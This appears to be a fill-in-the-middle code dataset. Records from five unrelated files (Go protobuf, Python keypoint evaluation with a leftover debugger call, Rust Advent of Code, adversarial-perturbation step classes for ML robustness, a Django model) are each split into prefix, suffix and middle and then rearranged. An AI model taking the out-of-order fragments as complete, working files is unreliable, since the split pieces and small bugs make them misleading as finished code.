func (m *ListPodPlanningsRequest) GetNamespacedName() *resources.NamespacedName {
if m != nil {
return m.NamespacedName
}
return nil
}
func (m *ListPodPlanningsRequest) GetKind() resources.Kind {
if m != nil {
return m.Kind
}
return resources.Kind_POD
}
func (m *ListPodPlanningsRequest) GetGranularity() int64 {
if m != nil {
return m.Granularity
}
return 0
}
func (m *ListPodPlanningsRequest) GetPlanningType() PlanningType {
if m != nil {
return m.PlanningType
}
return PlanningType_PT_UNDEFINED
}
// Represents a response for listing pod plannings request
type ListPodPlanningsResponse struct {
Status *status.Status `protobuf:"bytes,1,opt,name=status,proto3" json:"status,omitempty"`
PodPlannings []*PodPlanning `protobuf:"bytes,2,rep,name=pod_plannings,json=podPlannings,proto3" json:"pod_plannings,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListPodPlanningsResponse) Reset() { *m = ListPodPlanningsResponse{} }
func (m *ListPodPlanningsResponse) String() string { return proto.CompactTextString(m) }
func (*ListPodPlanningsResponse) ProtoMessage() {}
func (*ListPodPlanningsResponse) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{3}
}
func (m *ListPodPlanningsResponse) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListPodPlanningsResponse.Unmarshal(m, b)
}
func (m *ListPodPlanningsResponse) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListPodPlanningsResponse.Marshal(b, m, deterministic)
}
func (m *ListPodPlanningsResponse) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListPodPlanningsResponse.Merge(m, src)
}
func (m *ListPodPlanningsResponse) XXX_Size() int {
return xxx_messageInfo_ListPodPlanningsResponse.Size(m)
}
func (m *ListPodPlanningsResponse) XXX_DiscardUnknown() {
xxx_messageInfo_ListPodPlanningsResponse.DiscardUnknown(m)
}
var xxx_messageInfo_ListPodPlanningsResponse proto.InternalMessageInfo
func (m *ListPodPlanningsResponse) GetStatus() *status.Status {
if m != nil {
return m.Status
}
return nil
}
func (m *ListPodPlanningsResponse) GetPodPlannings() []*PodPlanning {
if m != nil {
return m.PodPlannings
}
return nil
}
// Represents a request for listing plannings of controllers
type ListControllerPlanningsRequest struct {
QueryCondition *common.QueryCondition `protobuf:"bytes,1,opt,name=query_condition,json=queryCondition,proto3" json:"query_condition,omitempty"`
NamespacedName *resources.NamespacedName `protobuf:"bytes,2,opt,name=namespaced_name,json=namespacedName,proto3" json:"namespaced_name,omitempty"`
CtlPlanningType ControllerPlanningType `protobuf:"varint,3,opt,name=ctl_planning_type,json=ctlPlanningType,proto3,enum=containersai.alameda.v1alpha1.datahub.plannings.ControllerPlanningType" json:"ctl_planning_type,omitempty"`
PlanningType PlanningType `protobuf:"varint,4,opt,name=planning_type,json=planningType,proto3,enum=containersai.alameda.v1alpha1.datahub.plannings.PlanningType" json:"planning_type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListControllerPlanningsRequest) Reset() { *m = ListControllerPlanningsRequest{} }
func (m *ListControllerPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*ListControllerPlanningsRequest) ProtoMessage() {}
func (*ListControllerPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{4}
}
func (m *ListControllerPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListControllerPlanningsRequest.Unmarshal(m, b)
}
func (m *ListControllerPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListControllerPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *ListControllerPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListControllerPlanningsRequest.Merge(m, src)
}
func (m *ListControllerPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_ListControllerPlanningsRequest.Size(m)
}
func (m *ListControllerPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_ListControllerPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_ListControllerPlanningsRequest proto.InternalMessageInfo
func (m *ListControllerPlanningsRequest) GetQueryCondition() *common.QueryCondition {
if m != nil {
return m.QueryCondition
}
return nil
}
func (m *ListControllerPlanningsRequest) GetNamespacedName() *resources.NamespacedName {
if m != nil {
return m.NamespacedName
}
return nil
}
func (m *ListControllerPlanningsRequest) GetCtlPlanningType() ControllerPlanningType {
if m != nil {
return m.CtlPlanningType
}
return ControllerPlanningType_CPT_UNDEFINED
}
func (m *ListControllerPlanningsRequest) GetPlanningType() PlanningType {
if m != nil {
return m.PlanningType
}
return PlanningType_PT_UNDEFINED
}
// Represents a response for listing controller plannings request
type ListControllerPlanningsResponse struct {
Status *status.Status `protobuf:"bytes,1,opt,name=status,proto3" json:"status,omitempty"`
ControllerPlannings []*ControllerPlanning `protobuf:"bytes,2,rep,name=controller_plannings,json=controllerPlannings,proto3" json:"controller_plannings,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListControllerPlanningsResponse) Reset() { *m = ListControllerPlanningsResponse{} }
func (m *ListControllerPlanningsResponse) String() string { return proto.CompactTextString(m) }
func (*ListControllerPlanningsResponse) ProtoMessage() {}
func (*ListControllerPlanningsResponse) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{5}
}
func (m *ListControllerPlanningsResponse) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListControllerPlanningsResponse.Unmarshal(m, b)
}
func (m *ListControllerPlanningsResponse) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListControllerPlanningsResponse.Marshal(b, m, deterministic)
}
func (m *ListControllerPlanningsResponse) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListControllerPlanningsResponse.Merge(m, src)
}
func (m *ListControllerPlanningsResponse) XXX_Size() int {
return xxx_messageInfo_ListControllerPlanningsResponse.Size(m)
}
func (m *ListControllerPlanningsResponse) XXX_DiscardUnknown() {
xxx_messageInfo_ListControllerPlanningsResponse.DiscardUnknown(m)
}
var xxx_messageInfo_ListControllerPlanningsResponse proto.InternalMessageInfo
func (m *ListControllerPlanningsResponse) GetStatus() *status.Status {
if m != nil {
return m.Status
}
return nil
}
func (m *ListControllerPlanningsResponse) GetControllerPlannings() []*ControllerPlanning {
if m != nil {
return m.ControllerPlannings
}
return nil
}
func init() {
proto.RegisterType((*CreatePodPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.CreatePodPlanningsRequest")
proto.RegisterType((*CreateControllerPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.CreateControllerPlanningsRequest")
proto.RegisterType((*ListPodPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListPodPlanningsRequest")
proto.RegisterType((*ListPodPlanningsResponse)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListPodPlanningsResponse")
proto.RegisterType((*ListControllerPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListControllerPlanningsRequest")
proto.RegisterType((*ListControllerPlanningsResponse)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListControllerPlanningsResponse")
}
func init() {
proto.RegisterFile("alameda_api/v1alpha1/datahub/plannings/services.proto", fileDescriptor_1293ef3062f3443f)
}
var fileDescriptor_1293ef3062f3443f = []byte{
// 544 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xdc, 0x55, 0xc1, 0x8e, 0xd3, 0x30,
0x10, 0x55, 0xda, 0xb2, 0x07, 0x77, 0xb7, 0x15, 0x01, 0x69, 0xc3, 0x1e, 0x20, 0xea, 0xa9, 0x42,
0xc2, 0x56, 0x8b, 0x96, 0x13, 0x08, 0x89, 0x0a, 0x21, 0x04, 0x42, 0x4b, 0xe0, 0xc4, 0x25, 0x9a,
0x3a, 0x56, 0x6b, 0x91, 0xda, 0xae, 0xed, 0x54, 0xea, 0xaf, 0x70, 0xe2, 0xca, 0x37, 0x70, 0xe6,
0xc2, 0x57, 0xa1, 0xa4, 0x49, 0x48, 0x09, 0x5b, 0x25, 0xa8, 0x5c, 0xf6, 0x36, 0xb6, 0x33, 0xf3,
0x9e, 0xe6, 0xbd, 0xc9, 0xa0, 0x4b, 0x88, 0x61, 0xc5, 0x22, 0x08, 0x41, 0x71, 0xb2, 0x99, 0x40,
0xac, 0x96, 0x30, 0x21, 0x11, 0x58, 0x58, 0x26, 0x73, 0xa2, 0x62, 0x10, 0x82, 0x8b, 0x85, 0x21,
0x86, 0xe9, 0x0d, 0xa7, 0xcc, 0x60, 0xa5, 0xa5, 0x95, 0x2e, 0xa1, 0x52, 0x58, 0xe0, 0x82, 0x69,
0x03, 0x1c, 0xe7, 0x35, 0x70, 0x91, 0x8f, 0xf3, 0x7c, 0x5c, 0xe6, 0x5f, 0x4c, 0x0e, 0xe2, 0x50,
0xb9, 0x5a, 0x49, 0x41, 0xd6, 0x09, 0xd3, 0xbc, 0xc0, 0xb8, 0x78, 0xd2, 0x90, 0x5a, 0x19, 0xe5,
0x79, 0xd3, 0x86, 0x79, 0x76, 0xab, 0x4a, 0xac, 0xc3, 0x6d, 0xd0, 0xcc, 0xc8, 0x44, 0x53, 0x66,
0xc8, 0x8a, 0x59, 0x48, 0x6f, 0x1b, 0x41, 0xfd, 0x4e, 0xab, 0x42, 0x9d, 0x2f, 0xa4, 0x5c, 0xc4,
0x8c, 0x68, 0x45, 0x89, 0xb1, 0x60, 0x93, 0xfc, 0x61, 0xf4, 0xd5, 0x41, 0xf7, 0x66, 0x9a, 0x81,
0x65, 0x57, 0x32, 0xba, 0x2a, 0x68, 0x06, 0x6c, 0x9d, 0x30, 0x63, 0x5d, 0x40, 0x67, 0x4a, 0x46,
0x61, 0x49, 0xdf, 0x73, 0xfc, 0xee, 0xb8, 0x3f, 0x7d, 0x8a, 0x5b, 0x2a, 0x81, 0x2b, 0xc5, 0x83,
0x53, 0x55, 0x41, 0x72, 0x7d, 0xd4, 0x5f, 0x68, 0x10, 0x49, 0x0c, 0x9a, 0xdb, 0xad, 0xd7, 0xf1,
0x9d, 0x71, 0x37, 0xa8, 0x5e, 0x8d, 0xbe, 0x38, 0xc8, 0xdf, 0x51, 0x9c, 0x49, 0x61, 0xb5, 0x8c,
0x63, 0xa6, 0x6b, 0x4c, 0x37, 0xe8, 0x2e, 0x2d, 0x5f, 0x6b, 0x84, 0x67, 0xad, 0x09, 0xd7, 0xa1,
0x82, 0x3b, 0xb4, 0x0e, 0x3f, 0xfa, 0xde, 0x45, 0xe7, 0x6f, 0xb9, 0xb1, 0x7f, 0xeb, 0x1e, 0x43,
0xc3, 0xd4, 0x5c, 0xdb, 0x90, 0x4a, 0x11, 0x71, 0xcb, 0xa5, 0xf0, 0x1c, 0xdf, 0x69, 0xd1, 0xbf,
0x9d, 0x43, 0xf1, 0xfb, 0xb4, 0xc8, 0xac, 0xa8, 0x11, 0x0c, 0xd6, 0x7b, 0x67, 0x77, 0x89, 0x86,
0x02, 0x56, 0xcc, 0x28, 0xa0, 0x2c, 0x0a, 0xd3, 0x30, 0xeb, 0x62, 0x7f, 0xfa, 0xbc, 0x21, 0x4c,
0x69, 0x19, 0xfc, 0xae, 0xac, 0x93, 0x46, 0xc1, 0x40, 0xec, 0x9d, 0xdd, 0xd7, 0xa8, 0xf7, 0x99,
0x8b, 0xc8, 0xeb, 0xfa, 0xce, 0x78, 0x30, 0xbd, 0x6c, 0x5d, 0xfe, 0x0d, 0x17, 0x51, 0x90, 0x95,
0xf8, 0x53, 0xf6, 0x5e, 0x4d, 0x76, 0x77, 0x8e, 0xce, 0x0a, 0x39, 0xc2, 0xd4, 0xca, 0xde, 0xad,
0x0c, 0xf5, 0x59, 0x7b, 0xef, 0xe5, 0xd1, 0xc7, 0xad, 0x62, 0xc1, 0xa9, 0xaa, 0x9c, 0x46, 0xdf,
0x1c, 0xe4, 0xd5, 0xd5, 0x33, 0x4a, 0x0a, 0xc3, 0xdc, 0x87, 0xe8, 0x64, 0x37, 0x2a, 0xb9, 0x6a,
0x2e, 0xde, 0x0d, 0x11, 0xd6, 0x8a, 0xe2, 0x0f, 0xd9, 0x4b, 0x90, 0x7f, 0x51, 0x1f, 0x94, 0xce,
0xb1, 0x07, 0x65, 0xf4, 0xb3, 0x8b, 0xee, 0xa7, 0x5c, 0x0f, 0x0c, 0xc1, 0x8d, 0x33, 0x9c, 0x41,
0xb7, 0xa9, 0x8d, 0xc3, 0x7d, 0x1f, 0xec, 0xdc, 0xf7, 0xea, 0x08, 0x23, 0x9d, 0x39, 0x62, 0x48,
0x6d, 0x5c, 0xbd, 0xa8, 0x1b, 0xaf, 0x77, 0x7c, 0xe3, 0xfd, 0x70, 0xd0, 0x83, 0x6b, 0xc5, 0xfc,
0x07, 0xff, 0x5d, 0xf7, 0xfb, 0xeb, 0xfc, 0xdf, 0xdf, 0xdf, 0x8b, 0x97, 0x9f, 0x66, 0x0b, 0x6e,
0x73, 0xeb, 0x54, 0xf6, 0xf3, 0x23, 0xe0, 0x24, 0x5d, 0x4f, 0xcd, 0xb6, 0xe2, 0xfc, 0x24, 0x5b,
0x46, 0x8f, 0x7f, 0x05, 0x00, 0x00, 0xff, 0xff, 0xae, 0x11, 0x73, 0x73, 0x19, 0x08, 0x00, 0x00,
} | |
pck_eval.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path as osp
import numpy as np
import pprint
import pdb
from . import evaluate_pr
import scipy.io as sio
'''
intervals : Define thresholds to evaluate pck score
kpnames : Keypoint names
bench_stats : stats
'''
def remove_nans(x):
return x[~np.isnan(x)]
def pck_at_intervals(intervals, error):
accuracy = []
for interval in intervals:
accuracy.append(float(np.round(np.mean(np.array(error) < interval), 3)))
return accuracy
def ck_at_interval(intervals, error):
cks = []
for interval in intervals:
cks.append(np.array(error) < interval)
return cks # len(intervals) x error.shape
def benchmark_all_instances(intervals, kpnames, bench_stats, img_size):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
pdb.set_trace()
# valid_inds =
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
return stats
def benchmark_all_instances_2(
intervals, kpnames, bench_stats, img_size, select_kp_ids=None
):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
# valid_inds =
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
# pdb.set_trace()
if select_kp_ids is not None:
for group_name in select_kp_ids.keys():
kp_ids = select_kp_ids[group_name]
select_kp_error = mean_kp_error[:, kp_ids]
samples = remove_nans(select_kp_error.reshape(-1))
stats['eval_params'][
'{}_acc'.format(group_name)
] = pck_at_intervals(intervals, samples.tolist())
samples = remove_nans(mean_kp_error.reshape(-1))
stats['eval_params']['acc'] = pck_at_intervals(intervals, samples.tolist())
return stats
def benchmark_vis_instances(
intervals, dist_thresholds, kpnames, bench_stats, img_size
):
stats = {}
stats['data'] = {}
stats['eval_params'] = {}
stats['pck'] = {}
stats['interval'] = intervals
bench_stats_kps_error = 1 * bench_stats['kps_err']
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
ndata_points, nkps, _ = bench_stats['kps_err'].shape
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
stats['eval_params']['total'] = np.sum(kps_vis1, axis=0) + 1E-10
for dx, dist_thresh in enumerate(dist_thresholds):
stats['eval_params'][dx] = {}
stats['eval_params'][dx]['correct'] = np.zeros(
(len(kpnames), len(intervals))
)
for kpx, kp_name in enumerate(kpnames):
valid_inds = np.where(
bench_stats_kps_error[:, kpx, 2] < dist_thresh
)[0].tolist()
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
valid_inds = set(valid_inds)
common_inds = set(common_inds)
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds & valid_inds))
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
ck[ex, :], axis=0
)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
bench_stats_kps_error[ex, kpx, 2] > dist_thresh
)
stats['eval_params'][dx]['acc'] = stats['eval_params'][dx]['correct'] / \
stats['eval_params']['total'].reshape(-1, 1)
return stats
def collate_all_instances(intervals, kp_names, bench_stats, img_size):
bench_stats_kps_error = bench_stats['kps_err'] * 1
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
prediction_error = [] # N x 1
prediction_score = [] # N x 1
prediction_label = [] # N x len(intervals)
gt_label = []
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
for kpx, kp_name in enumerate(kp_names):
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds))
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 1)
gt_label.append(ck[ex, :] * 0 + 1)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 0)
gt_label.append(ck[ex, :] * 0)
prediction_error = np.concatenate(prediction_error, axis=0)
prediction_score = np.concatenate(prediction_score, axis=0)
prediction_label = np.concatenate(prediction_label, axis=0)
gt_label = np.concatenate(gt_label, axis=0)
stats = {}
stats['pred_label'] = prediction_label
stats['gt_label'] = gt_label
stats['score'] = prediction_score # lower the score better it is.
return stats
kp_eval_thresholds = [0.05, 0.1, 0.2]
# kp_eval_thresholds = [0.05, 1.0]
'''
select_kp_ids dict is a group of kp points
'''
def run_evaluation(
bench_stats, n_iter, results_dir, img_size, kp_names, dist_thresholds,
select_kp_ids
):
json_file = osp.join(results_dir, 'stats_m1_{}.json'.format(n_iter))
stats_m1 = benchmark_all_instances_2(
kp_eval_thresholds, kp_names, bench_stats, img_size, select_kp_ids
)
stats = stats_m1
print(' Method 1 | Keypoint | Median Err | Mean Err | STD Err')
pprint.pprint(
zip(
stats['kp_names'], stats['median_kp_err'], stats['mean_kp_err'],
stats['std_kp_err']
)
)
print('PCK Values')
pprint.pprint(stats['interval'])
pprint.pprint(stats['pck'])
mean_pck = {}
# pdb.set_trace() | for i, thresh in enumerate(stats['interval']):
mean_pck[thresh] = []
for kp_name in kp_names:
mean_pck[thresh].append(stats['pck'][kp_name][i])
mean_pck = {k: np.mean(np.array(t)) for k, t in mean_pck.items()}
pprint.pprint('Mean PCK ')
pprint.pprint(mean_pck)
print('Instance Average **** ')
pprint.pprint(stats['eval_params']['acc'])
for group_name in select_kp_ids.keys():
print('Instance Average {} **** '.format(group_name))
pprint.pprint(stats['eval_params']['{}_acc'.format(group_name)])
print('########################## ')
with open(json_file, 'w') as f:
json.dump(stats, f)
if dist_thresholds is not None:
stats_m1 = benchmark_vis_instances(
kp_eval_thresholds, dist_thresholds, kp_names, bench_stats, img_size
)
stats = stats_m1
mean_pck = {}
# points_per_kp = {k: v for k, v in zip(kp_names, stats['eval_params'][0]['npoints'])}
# points_per_thresh = np.sum(np.array(points_per_kp.values()))
for dx, thresh in enumerate(dist_thresholds):
mean_pck[dx] = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[dx][thresh] = []
for kx, kp_name in enumerate(kp_names):
mean_pck[dx][thresh].append(
stats['eval_params'][dx]['acc'][kx, i]
)
mean_pck[dx] = {
k: np.round(np.mean(np.array(t)), 4)
for k, t in mean_pck[dx].items()
}
# pdb.set_trace()
print('***** Distance Thresholds ***** ')
pprint.pprint('Mean PCK Acc')
pprint.pprint(mean_pck)
# pprint.pprint(points_per_kp)
stats = collate_all_instances(
kp_eval_thresholds, kp_names, bench_stats, img_size
)
pr_stats = evaluate_pr.inst_bench_evaluate(
stats['pred_label'], stats['gt_label'], stats['score']
)
pr_mat_file = osp.join(results_dir, 'pr_{}.mat'.format(n_iter))
sio.savemat(pr_mat_file, pr_stats)
return stats_m1 | |
day1.rs | use std::collections::HashSet;
#[aoc_generator(day1)]
pub fn input_generator(input: &str) -> Vec<i32> {
input.lines().map(|line| line.parse().unwrap()).collect()
}
#[aoc(day1, part1)] | #[aoc(day1, part2)]
pub fn solve_part2(input: &[i32]) -> i32 {
let mut records = HashSet::new();
records.insert(0);
let mut current_frequency = 0;
for change in input.iter().cycle() {
current_frequency += change;
if !records.insert(current_frequency) {
break;
}
}
current_frequency
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn part1() {
assert_eq!(
solve_part1(&input_generator(
r"+1
+1
+1"
)),
3,
);
assert_eq!(
solve_part1(&input_generator(
r"+1
+1
-2"
)),
0
);
assert_eq!(
solve_part1(&input_generator(
r"-1
-2
-3"
)),
-6
);
}
#[test]
fn part2() {
assert_eq!(
solve_part2(&input_generator(
r"+1
-1"
)),
0
);
assert_eq!(
solve_part2(&input_generator(
r"+3
+3
+4
-2
-4"
)),
10
);
assert_eq!(
solve_part2(&input_generator(
r"-6
+3
+8
+5
-6"
)),
5
);
assert_eq!(
solve_part2(&input_generator(
r"+7
+7
-2
-7
-4"
)),
14
);
}
} | pub fn solve_part1(input: &[i32]) -> i32 {
input.iter().sum()
}
|
attack_steps.py | """
**For most use cases, this can just be considered an internal class and
ignored.**
This module contains the abstract class AttackerStep as well as a few subclasses.
AttackerStep is a generic way to implement optimizers specifically for use with
:class:`robustness.attacker.AttackerModel`. In general, except for when you want
to :ref:`create a custom optimization method <adding-custom-steps>`, you probably do not need to
import or edit this module and can just think of it as internal.
"""
import torch as ch
class AttackerStep:
'''
Generic class for attacker steps, under perturbation constraints
specified by an "origin input" and a perturbation magnitude.
Must implement project, step, and random_perturb
'''
def __init__(self, orig_input, eps, step_size, use_grad=True):
'''
Initialize the attacker step with a given perturbation magnitude.
Args:
eps (float): the perturbation magnitude
orig_input (ch.tensor): the original input
'''
self.orig_input = orig_input
self.eps = eps
self.step_size = step_size
self.use_grad = use_grad
def project(self, x):
'''
Given an input x, project it back into the feasible set
Args:
ch.tensor x : the input to project back into the feasible set.
Returns:
A `ch.tensor` that is the input projected back into
the feasible set, that is,
.. math:: \min_{x' \in S} \|x' - x\|_2
'''
raise NotImplementedError
def step(self, x, g):
'''
Given a gradient, make the appropriate step according to the
perturbation constraint (e.g. dual norm maximization for :math:`\ell_p`
norms).
Parameters:
g (ch.tensor): the raw gradient
Returns:
The new input, a ch.tensor for the next step.
'''
raise NotImplementedError
def random_perturb(self, x):
'''
Given a starting input, take a random step within the feasible set
'''
raise NotImplementedError
def to_image(self, x):
'''
Given an input (which may be in an alternative parameterization),
convert it to a valid image (this is implemented as the identity
function by default as most of the time we use the pixel
parameterization, but for alternative parameterizations this functino
must be overriden).
'''
return x
### Instantiations of the AttackerStep class
# L-infinity threat model
class LinfStep(AttackerStep):
"""
Attack step for :math:`\ell_\infty` threat model. Given :math:`x_0`
and :math:`\epsilon`, the constraint set is given by:
.. math:: S = \{x | \|x - x_0\|_\infty \leq \epsilon\}
"""
def project(self, x):
"""
"""
diff = x - self.orig_input
diff = ch.clamp(diff, -self.eps, self.eps)
return ch.clamp(diff + self.orig_input, 0, 1)
def step(self, x, g):
"""
"""
step = ch.sign(g) * self.step_size
return x + step
def random_perturb(self, x):
"""
"""
new_x = x + 2 * (ch.rand_like(x) - 0.5) * self.eps
return ch.clamp(new_x, 0, 1)
# L2 threat model
class L2Step(AttackerStep):
"""
Attack step for :math:`\ell_\infty` threat model. Given :math:`x_0`
and :math:`\epsilon`, the constraint set is given by:
.. math:: S = \{x | \|x - x_0\|_2 \leq \epsilon\}
"""
def project(self, x):
"""
"""
diff = x - self.orig_input
diff = diff.renorm(p=2, dim=0, maxnorm=self.eps)
return ch.clamp(self.orig_input + diff, 0, 1)
def step(self, x, g):
"""
"""
l = len(x.shape) - 1
g_norm = ch.norm(g.view(g.shape[0], -1), dim=1).view(-1, *([1]*l))
scaled_g = g / (g_norm + 1e-10)
return x + scaled_g * self.step_size
def random_perturb(self, x):
"""
"""
l = len(x.shape) - 1
rp = ch.randn_like(x)
rp_norm = rp.view(rp.shape[0], -1).norm(dim=1).view(-1, *([1]*l))
return ch.clamp(x + self.eps * rp / (rp_norm + 1e-10), 0, 1)
# Unconstrained threat model
class UnconstrainedStep(AttackerStep):
"""
Unconstrained threat model, :math:`S = [0, 1]^n`.
"""
def project(self, x):
"""
"""
return ch.clamp(x, 0, 1)
def step(self, x, g):
"""
"""
return x + g * self.step_size
def | (self, x):
"""
"""
new_x = x + (ch.rand_like(x) - 0.5).renorm(p=2, dim=0, maxnorm=step_size)
return ch.clamp(new_x, 0, 1)
class FourierStep(AttackerStep):
"""
Step under the Fourier (decorrelated) parameterization of an image.
See https://distill.pub/2017/feature-visualization/#preconditioning for more information.
"""
def project(self, x):
"""
"""
return x
def step(self, x, g):
"""
"""
return x + g * self.step_size
def random_perturb(self, x):
"""
"""
return x
def to_image(self, x):
"""
"""
return ch.sigmoid(ch.irfft(x, 2, normalized=True, onesided=False))
class RandomStep(AttackerStep):
"""
Step for Randomized Smoothing.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.use_grad = False
def project(self, x):
"""
"""
return x
def step(self, x, g):
"""
"""
return x + self.step_size * ch.randn_like(x)
def random_perturb(self, x):
"""
"""
return x
| random_perturb |
post.py | from django.db import models
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from hexchan import config
class Post(models.Model):
hid = models.IntegerField(
_('HID'),
editable=False,
db_index=True
)
thread = models.ForeignKey(
'Thread',
verbose_name=_('Thread'),
related_name='posts',
on_delete=models.CASCADE,
editable=False,
db_index=True
)
created_at = models.DateTimeField(
_('Created at'),
auto_now_add=True,
editable=False,
db_index=True
)
updated_at = models.DateTimeField(
_('Updated at'),
auto_now=True,
editable=False,
db_index=True
)
text = models.TextField(
_('Text'),
max_length=2048,
blank=True
)
title = models.CharField(
_('Title'),
max_length=64,
blank=True
)
author = models.CharField(
_('Author'),
max_length=32,
blank=True
)
email = models.CharField(
_('E-mail'),
max_length=32,
blank=True
)
password = models.CharField(
_('Password'),
max_length=16,
blank=True
)
is_op = models.BooleanField(
_('Is OP'),
editable=False
)
user_was_warned = models.BooleanField(
_('User was warned'),
default=False
)
user_was_banned = models.BooleanField(
_('User was banned'),
default=False
)
is_deleted = models.BooleanField(
_('Is deleted'),
default=False,
db_index=True
)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name=_('Created by'),
on_delete=models.SET_NULL,
null=True,
editable=False
)
